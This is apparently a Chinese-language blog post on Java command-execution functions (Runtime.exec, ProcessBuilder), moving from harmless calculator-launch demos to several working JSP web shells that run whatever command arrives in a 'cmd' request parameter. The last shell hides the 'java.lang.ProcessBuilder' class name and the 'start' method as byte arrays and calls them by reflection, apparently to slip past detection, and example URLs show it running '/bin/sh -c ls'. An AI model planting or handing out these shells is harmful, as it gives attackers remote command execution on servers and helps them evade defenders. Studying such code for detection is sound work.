java命令执行函数:

  • Runtime.exec
  • ProcessBuilder
  • ProcessImpl
  • UNIXProcess

Runtime命令执行

Runtime命令执行应该是现在在java命令执行中使用的最多的一种方式。

package com.company;

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;


public class Main {

    public static void main(String[] args) throws Exception {
        String command = "open /System/Applications/Calculator.app";
        Process p = Runtime.getRuntime().exec(command);
    //读取命令的输出信息    
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        p.waitFor(); //阻塞当前进程,直到命令执行结束
        if (p.exitValue() != 0) {  //命令执行错误,报错
            System.out.println("error");
        }
        String s = null;
    //打印命令的输出信息
        while ((s = reader.readLine()) != null) {
            System.out.println(s);
        }
    }
}

cmd-shell.jsp执行cmd代码如下

<%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>

<%
    InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        String s = null;
        while ((s = reader.readLine()) != null) {
            out.write("<pre>"+s+"</pre>");
        }
%>

image
查看下exec触发的底层源码
Runtime.java

image

ProcessBuilder.java

image

ProcessBuilder

package com.company;

import java.io.BufferedReader;
import java.util.ArrayList;
import java.util.List;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Main {

    public static void main(String[] args) throws Exception {
        String command = "open /System/Applications/Calculator.app";
        String[] commandSplit = command.split(" ");
        List<String> lcommand = new ArrayList<String>();
        for (int i = 0; i < commandSplit.length; i++) {
            lcommand.add(commandSplit[i]);
        }

        ProcessBuilder processBuilder = new ProcessBuilder(lcommand);
        processBuilder.redirectErrorStream(true);
        Process p = processBuilder.start();
    }
}

image

shell.jsp

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%
    InputStream p = new ProcessBuilder(request.getParameterValues("cmd")).start().getInputStream();
    BufferedReader bs = new BufferedReader(new InputStreamReader(p));

    String line = null;
    while ((line = bs.readLine()) != null) {
        out.write("<pre>" + line + "</pre>");
    }
%>

url: /shell.jsp?cmd=/bin/sh&cmd=-c&cmd=ls
image

稍微处理下

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.util.List" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="java.util.ArrayList" %>
<%
    String str = request.getParameter("cmd");  
    List<String> list = new ArrayList<>();  
    list.add("/bin/bash");            
    list.add("-c");  
    list.add(str); 
    String rt = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 80,114,111,99,101,115,115,66,117,105,108,100,101,114});
    Class PB = Class.forName(rt); 
    Process s = (Process) PB.getMethod(new String(new byte[]{115, 116, 97, 114, 116})).invoke(PB.getDeclaredConstructors()[0].newInstance(list));
    Scanner sc = new Scanner(s.getInputStream());        
    String result = "";        
    result = sc.hasNext() ? sc.next() : result;              
    out.println(result);    
%>

url: `/shell.jsp?cmd=ls

最后修改:2021 年 02 月 15 日 01 : 41 PM
如果觉得我的文章对你有用,请随意赞赏